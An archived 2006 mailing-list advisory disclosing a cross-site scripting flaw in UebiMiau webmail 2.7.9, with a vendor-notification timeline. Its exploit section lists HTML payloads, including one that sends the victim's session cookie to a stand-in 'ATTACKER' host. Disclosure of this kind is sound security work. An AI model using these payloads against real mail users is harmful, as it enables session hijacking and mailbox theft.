Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

UebiMiau Webmail System Security Vulnerability

from [M.Neset KABAKLI] Network Security [Permanent Link]
Subject: UebiMiau Webmail System Security Vulnerability
Date: Sun, 29 Jan 2006 17:22:12 +0200 

I.Vulnerability
UebiMiau Webmail System Cross Site Scripting Vulnerability


II.Vendor
Aldoir Ventura 


III.Affected Systems
* UebiMiau 2.7.9 (latest release) and probably previous versions.


IV.About
UebiMiau is a simple, yet efficient mail reader (webmail) supporting both
IMAP and POP3 without dependence of any PHP's extra modules or database
(http://www.uebimiau.org).


V.Description
UebiMiau does not filter HTML e-mail messages correctly, it's possible to
inject mailicious scripting codes to an e-mail. An attacker is able to
hijack a user's session and access victim's mailbox just by sending a
specially crafted e-mail message. 

This is a dangerous situation because there is no need to click a link in
some cases, client-side code executing when the user opens crafted e-mail.


VI.Exploit 
<img
src="javascript:location.href='http://ATTACKER/StealSessionData/?'+document.
cookie;" />
<img src="javascript:[XSS];" />
<a href="javascript:location.href='http://ATTACKER/StealSessionData/'">test
link 1</a>
<a href='http://ATTACKER/StealData/'>test link 2</a>


VII.Vulnerability Status
* Vulnerability discovered on 2006-01-12.
* Vendor notified on 2006-01-12.
* No response from vendor, vulnerability published on 2006-01-28.


VIII.Workarounds
* No vendor-supplied patch is currently available.


IX.Credits
M.Neset KABAKLI
Wakiza Software Technologies 
neset{at}wakiza{dot}com
www.wakiza.com
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • UebiMiau Webmail System Security Vulnerability, M.Neset KABAKLI <=
Previous by Date:  Re: Re: IndonesiaHack Advisory HTML injection in PHP Fusebox, pr1nce_empire
Next by Date:  [Full-disclosure] ashnews Cross-Site Scripting Vulnerability, zeus olimpusklan
Previous by Thread:  zbattle.net, c_lispfedora
Next by Thread:  [Full-disclosure] ashnews Cross-Site Scripting Vulnerability, zeus olimpusklan
Indexes:  [Date] [Thread] [Top] [All Lists]